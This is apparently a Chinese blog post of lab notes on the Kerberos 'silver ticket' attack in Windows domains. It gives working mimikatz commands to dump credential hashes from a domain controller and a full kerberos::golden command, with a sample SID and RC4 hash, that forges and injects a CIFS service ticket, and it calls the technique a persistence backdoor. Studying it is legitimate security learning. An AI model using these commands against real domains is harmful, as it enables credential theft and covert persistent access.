• 域渗透之银票据学习.md


    域渗透之银票据学习

    银票据(silver ticket):它不需要和域控制器进行通信,原理是伪造TGS,使用的是计算机账户的hash进行加密的,所以只能访问指定的权限,也就是只能访问特定的服务。

    0x01 银票据利用条件

    域控计算机账户的ntlm hash

    域中的sid值

    一台域中主机

    与其说是一种攻击方式,不如说是一种后门,当域控权限掉后,再重新获取权限。

    0x02 实战

    环境
    域控2k3,ip:192.168.5.97
    域内主机07,ip:192.168.5.155

    1)在域控中导出计算机账号的ntlm hash

    mimikatz log "privilege::debug" "sekurlsa::logonpasswords"
    

    在这里插入图片描述

    2)获取域的sid,任意域内主机,不要后面的-1107

    whoami /all
    

    在这里插入图片描述

    3) 在攻击机使用mimikatz执行,user名随意,cifs是指的文件共享服务。

    kerberos::golden /domain:jiu.com /sid:S-1-5-21-3949334927-2019361082-1435771806  /target:aa-e.jiu.com /rc4:e3e13d1245a7cb55fd58ac902fc0d760  /service:cifs /user:jiu /ptt
    

    在这里插入图片描述

    4) 验证

    在这里插入图片描述

    0x03 踩坑

    target应为计算机全名

    在这里插入图片描述

    0x04 参考

    https://www.cnblogs.com/bmjoker/p/10355979.html
    https://www.freebuf.com/articles/system/197160.html
    
  • 相关阅读:
    C语言I博客作业05
    C语言I博客作业04
    C语言II博客作业01
    学期总结
    第一周作业
    C语言I博客作业08
    C语言I博客作业07
    C语言I博客作业06
    C语言I博客作业05
    C语言I博客作业04
  • 原文地址:https://www.cnblogs.com/nsfoxer/p/16317370.html
Copyright © 2020-2023  润新知